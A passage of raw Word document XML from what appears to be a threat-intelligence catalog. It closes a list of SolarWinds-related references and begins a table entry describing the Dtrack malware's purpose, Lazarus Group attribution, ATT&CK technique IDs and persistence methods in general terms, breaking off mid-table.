                <w:t>MITRE ATT&amp;CK Software Catalog</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3. </w:t>
            </w:r>
            <w:hyperlink r:id="rId40" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>FireEye SolarWinds Investigation</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4. </w:t>
            </w:r>
            <w:hyperlink r:id="rId41" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t xml:space="preserve">Microsoft </w:t>
              </w:r>
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>Solorigate</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t xml:space="preserve"> Analysis</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 5. </w:t>
            </w:r>
            <w:hyperlink r:id="rId42" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>CISA SolarWinds Guidance</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F9B8578" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71283540" w14:textId="24BBB472" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Dtrack </w:t>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="009B4494" w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> S0567</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0"/>
        <w:gridCol w:w="8968"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="49828F94" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="138514DD" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="737E25F1" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="7B281361" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30CAF283" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Name &amp; Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74C66BF2" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Dtrack (S0567)</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Malware / Remote Access Trojan (RAT) / Spyware</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="2CCEDA5E" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B7C62CE" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DE74855" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Dtrack is a modular malware framework associated with the Lazarus Group. It is capable of espionage, system reconnaissance, keylogging, file manipulation, and remote command execution. Dtrack has been observed targeting financial institutions, research organizations, telecom companies, and critical infrastructure sectors.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="4DDE5004" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="169C1ACC" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Threat Actor Association</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DBCC4FE" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Lazarus Group, Hidden Cobra</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="13C08B1A" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64B07A26" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Supported Platforms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="614AF5B2" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Windows, Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="7C6EB2D9" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CA52B53" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>ATT&amp;CK Techniques Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="477C08E9" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1059</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Command and Scripting Interpreter </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1105</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Ingress Tool Transfer </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1082</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – System Information Discovery </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1016</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – System Network Configuration Discovery </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1005</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Data from Local System </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1056.001</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Input Capture: Keylogging </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1041</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Exfiltration Over C2 Channel </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1071</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Application Layer Protocol </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1027</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Obfuscated Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="4DA4FB21" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DD037BA" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Execution Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77F6AF03" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Executed through malicious droppers or compromised applications. Once installed, Dtrack enables remote command execution and deployment of additional modules on infected systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="6C4418A2" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D42F056" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Persistence Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C0AFACC" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Establishes persistence using Windows services, registry modifications, scheduled tasks, and startup entries depending on the deployed variant.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="4CBD445E" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B71E55B" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B789A1E" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>No standalone privilege escalation exploit publicly documented; attackers generally combine Dtrack with stolen credentials or additional tooling for elevated access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="15B3B80F" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13F4B154" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
